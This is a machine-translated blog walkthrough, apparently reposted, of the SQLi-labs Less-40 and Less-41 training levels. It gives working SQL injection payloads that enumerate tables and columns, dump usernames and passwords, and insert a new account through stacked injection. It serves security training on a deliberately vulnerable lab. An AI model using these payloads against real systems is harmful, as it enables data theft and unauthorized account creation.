当前位置:网站首页>(manual) [sqli labs40, 41] stack injection, blind injection

(manual) [sqli labs40, 41] stack injection, blind injection

2022-07-18 15:21:00 Black zone (rise)

Catalog

One 、 recommend :

Two 、( manual )SQL Basic steps of injection :

3、 ... and 、Less40(GET - BLIND based - String - Stacked)

3.1、 brief introduction :( Stack Injection - Blind note - Character injection )

 3.2、 First step : Injection point test

 3.3、 The second step : Analysis and filtering

3.4、 The third step : Determine the number of fields / Echo position

3.5、 Step four : Warehouse

3.6、 Step five : Name of Pop Watch

3.7、 Step six : Pop field

 3.8、 Step seven : Stack Injection accounts

3.9、 Step eight : Burst data

Four 、Less41(GET - BLIND based -Intiger Stacked)

5.1、 brief introduction :( Stack Injection - Blind note - Digital injection )

5.2、 utilize :

One 、 recommend :

【SQL Inject 】 Stack Injection icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL Inject 】 Digital injection & Character injection icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185^v2^control&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450

【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL Inject - No echo 】 Time blind note : principle 、 function 、 Use process icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

Two 、( manual )SQL Basic steps of injection :

First step : Injection point test

The second step : Analyze permissions

The third step : Determine the number of fields

Step four : Burst database name

Step five : Name of Pop Watch

Step six : Pop field name

Step seven : Stack Injection accounts

Step eight : Inquire about

3、 ... and 、Less40(GET - BLIND based - String - Stacked)

3.1、 brief introduction :( Stack Injection - Blind note - Character injection )

Request method :GET

Method : Stack Injection +') closed ( Character injection )+ Blind note + The joint query

 3.2、 First step : Injection point test

?id=1

Normal page

 

Input ?id=1'

Abnormal page

Indicates that there is an injection point , There is a single quotation mark closure

 

 ?id=1'--+

Abnormal page

Indicates that there are other closures

 

?id=1')--+

Normal page

Through the above tests, we can get

There are injection points

And for ') closed

 3.3、 The second step : Analysis and filtering

Method 1 :

Consider replacing the injected statement characters one by one step , Until there is no error ( A waste of time )

Or replace them all ( If you make a mistake , I don't know where it is filtered )

Method 2 :

Get the source code for white box audit ( The optimal )

3.4、 The third step : Determine the number of fields / Echo position

?id=1') union select 1,2,3 --+

Echo normal

 

?id=1') union select 1,2,3,4 --+

Abnormal echo

  The number of description fields is 3

Determine the echo position

?id=-1') union select 1,2,3 --+

 

3.5、 Step four : Warehouse

?id=-1') union select 1,2,database() --+

3.6、 Step five : Name of Pop Watch

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

3.7、 Step six : Pop field

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+


 

 3.8、 Step seven : Stack Injection accounts

?id=1');insert into users(id,username,password) values ('40','less40','at40')--+

 

3.9、 Step eight : Burst data

?id=-1') union select 1,2,group_concat(username,password) from security.users--+

We can see the data we injected

 

Four 、Less41(GET - BLIND based -Intiger Stacked)

5.1、 brief introduction :( Stack Injection - Blind note - Digital injection )

Request method :GET

Method : Stack Injection + closed ( Digital injection )+ Blind note + The joint query

5.2、 utilize :

And Less40 comparison

41 It's digital injection , No closure required

原网站

版权声明
本文为[Black zone (rise)]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/199/202207151844338946.html

边栏推荐

猜你喜欢

随机推荐